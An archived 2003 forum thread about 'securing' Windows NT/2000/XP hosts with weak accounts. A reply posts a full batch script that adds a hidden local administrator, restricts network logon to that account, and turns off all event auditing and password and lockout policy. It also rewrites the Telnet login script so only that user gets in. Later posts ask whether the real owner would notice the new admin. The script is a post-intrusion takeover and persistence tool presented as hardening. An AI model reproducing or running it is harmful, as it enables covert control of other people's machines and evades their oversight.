Forums: Securing A Host Against Ntpass Attack - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Securing A Host Against Ntpass Attack

#1 User is offline   =k3Rn= 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 158
  • Joined: 17-September 03

Posted 17 September 2003 - 11:54 PM

hi !

i want to write a short batch file to secure host taht have weak nt accounts.
up to now i found the following registry keys, to turn off remote registry access and the automated admin shares.

in the bacth u would first kill the shares (c$-x$, ipc$, admin$)
and then add the reg keys

HKEY_LOCAL_MACHINE --> System --> CurrentControlSet --> Services --> LanmanServer --> Parameters

die 2 Reg_Dwords "AutoShareServer" und "AutoShareWks" set to zero

and

echo REGEDIT4 >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry

what else has to be done ?
does anyone got a bacth file to manage that ?

greeting
=k3Rn=
0

#2 User is offline   LiquidIce 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 34
  • Joined: 04-June 03

Posted 27 September 2003 - 05:45 PM 

rem Blocks all netbios connections from all accounts except the one specified
rem secure.bat UserName Password *

@echo off
del temp
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional)  >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp

net user /add %1 %2
net localgroup administrators %1 /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp

del %SystemRoot%\system32\login.cmd
echo @echo off >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem  Default global login script for the Telnet Server  >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem  In the default setup, this command script is executed when the >> %SystemRoot%\system32\login.cmd
echo rem  initial command shell is invoked.  It, in turn, will try to invoke >> %SystemRoot%\system32\login.cmd
echo rem  the individual user's login script. >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd

echo if %%USERNAME%%==%1 goto good >> %SystemRoot%\system32\login.cmd
echo exit >> %SystemRoot%\system32\login.cmd
echo :good >> %SystemRoot%\system32\login.cmd

echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd
echo echo Welcome to Microsoft Telnet Server. >> %SystemRoot%\system32\login.cmd
echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd

echo cd %%HOMEDRIVE%%%HOMEPATH%% /d >> %SystemRoot%\system32\login.cmd
del temp

del root.reg
echo REGEDIT4  >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry
del root.reg

0

#3 User is offline   =k3Rn= 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 158
  • Joined: 17-September 03

Posted 27 September 2003 - 06:58 PM

yea i know that batch file.
first question, does it only work on win2k systems or also on win xp?
and second, it creats a new admin account - won't the admin / user of the computer see that ?
0

#4 Guest_hermel_*

  • Group: Guests

Posted 14 October 2003 - 12:00 AM

The batch file works on NT, W2K and XP.

You can add a new user with:
net user hermel myPW /add
net localgroup Administrators hermel /add


But the Admin can see that a new User with Adminrights is there.
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting